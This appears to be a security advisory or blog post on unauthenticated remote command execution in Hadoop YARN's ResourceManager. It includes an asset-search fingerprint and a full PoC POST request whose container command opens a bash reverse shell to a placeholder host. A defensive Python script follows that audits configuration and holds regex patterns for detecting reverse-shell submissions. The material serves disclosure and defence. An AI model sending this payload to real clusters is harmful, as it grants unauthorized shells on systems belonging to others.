Apache Hadoop Yarn Rpc Remote Command Execution Vulnerability
Vulnerability Description
The Hadoop YARN RPC unauthorized access vulnerability exists in the ResourceManager component of Hadoop YARN, which is responsible for resource management and task scheduling. The root cause is that the RPC service this component exposes to users can be accessed without authentication in the default configuration.
Vulnerability Impact
Apache Hadoop
Network mapping (asset search)
app="APACHE-hadoop-YARN"
Vulnerability reproduction
Main page
Verification request
POST /ws/v1/cluster/apps HTTP/1.1
Host:
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 215
Content-Type: application/json

{"application-id": "application_1655112607010_0005", "application-name": "get-shell", "am-container-spec": {"commands": {"command": "/bin/bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/9998 0>&1"}}, "application-type": "YARN"}
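The request above works only because the ResourceManager accepts unauthenticated application submissions. The following Python script is an added example (not from the original post or the Hadoop project) that shows the two checks a defender wants: auditing the Hadoop site configuration for the settings that leave the service open (the real properties hadoop.security.authentication, hadoop.security.authorization and yarn.acl.enable), and flagging a submission body whose am-container-spec command carries the interactive-shell indicators visible in the request above. The XML configurations and the two JSON bodies are constructed sample input; the property defaults assumed when a property is absent are Hadoop's documented defaults.

```python
import json
import re
import xml.etree.ElementTree as ET

# Constructed sample: a default-style core-site.xml that leaves RPC/REST
# without authentication, the condition the advisory describes.
CORE_SITE_DEFAULT = """<configuration>
  <property><name>fs.defaultFS</name><value>hdfs://rm-host:9000</value></property>
  <property><name>hadoop.security.authentication</name><value>simple</value></property>
</configuration>"""

# Constructed sample: the hardened counterpart (Kerberos plus authorization and ACLs).
CORE_SITE_HARDENED = """<configuration>
  <property><name>hadoop.security.authentication</name><value>kerberos</value></property>
  <property><name>hadoop.security.authorization</name><value>true</value></property>
  <property><name>yarn.acl.enable</name><value>true</value></property>
</configuration>"""

# Property -> (value a defender expects, Hadoop default applied when unset).
REQUIRED = {
    "hadoop.security.authentication": ("kerberos", "simple"),
    "hadoop.security.authorization": ("true", "false"),
    "yarn.acl.enable": ("true", "false"),
}


def parse_hadoop_config(xml_text):
    """Return {name: value} for every <property> in a Hadoop *-site.xml document."""
    props = {}
    for prop in ET.fromstring(xml_text).iter("property"):
        name = prop.findtext("name")
        if name is not None:
            props[name.strip()] = (prop.findtext("value") or "").strip()
    return props


def audit_config(xml_text):
    """List each security-relevant property whose effective value is not the expected one."""
    props = parse_hadoop_config(xml_text)
    findings = []
    for name, (wanted, default) in REQUIRED.items():
        actual = props.get(name, default)  # unset property -> Hadoop default
        if actual.lower() != wanted:
            findings.append(f"{name}={actual} (expected {wanted})")
    return findings


# Indicators of an AM container command that opens an interactive shell to a
# remote host; all three appear in the request shown above.
SHELL_INDICATORS = [
    re.compile(r"/dev/tcp/"),
    re.compile(r"\bbash\s+-i\b"),
    re.compile(r"0>&1"),
]


def extract_commands(submission):
    """Collect the command string(s) from am-container-spec.commands, whatever the shape."""
    cmds = submission.get("am-container-spec", {}).get("commands", {})
    if isinstance(cmds, dict):
        cmds = cmds.get("command", [])
    if isinstance(cmds, str):
        cmds = [cmds]
    return [c for c in cmds if isinstance(c, str)]


def flag_submission(body):
    """Return (application-id, list of matched indicator patterns) for a submission JSON body."""
    sub = json.loads(body)
    hits = [rx.pattern for cmd in extract_commands(sub) for rx in SHELL_INDICATORS if rx.search(cmd)]
    return sub.get("application-id", "?"), hits


# Constructed sample bodies: the page's PoC shape with its placeholder address, and a benign job.
SUSPICIOUS_BODY = json.dumps({
    "application-id": "application_1655112607010_0005",
    "application-name": "get-shell",
    "am-container-spec": {"commands": {"command": "/bin/bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/9998 0>&1"}},
    "application-type": "YARN",
})
BENIGN_BODY = json.dumps({
    "application-id": "application_1655112607010_0006",
    "application-name": "wordcount",
    "am-container-spec": {"commands": {"command": "hadoop jar wordcount.jar input output"}},
    "application-type": "MAPREDUCE",
})

if __name__ == "__main__":
    for label, cfg in (("default", CORE_SITE_DEFAULT), ("hardened", CORE_SITE_HARDENED)):
        print(label, "config findings:", audit_config(cfg) or "none")
    for body in (SUSPICIOUS_BODY, BENIGN_BODY):
        app_id, hits = flag_submission(body)
        print(app_id, "flagged" if hits else "clean", hits)
```

Run it against a cluster's own core-site.xml and yarn-site.xml, and feed the second check with application submissions taken from the ResourceManager audit trail; a non-empty finding list from either function means the exposure described on this page is present or being used.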
This post is licensed under CC BY 4.0 by the author.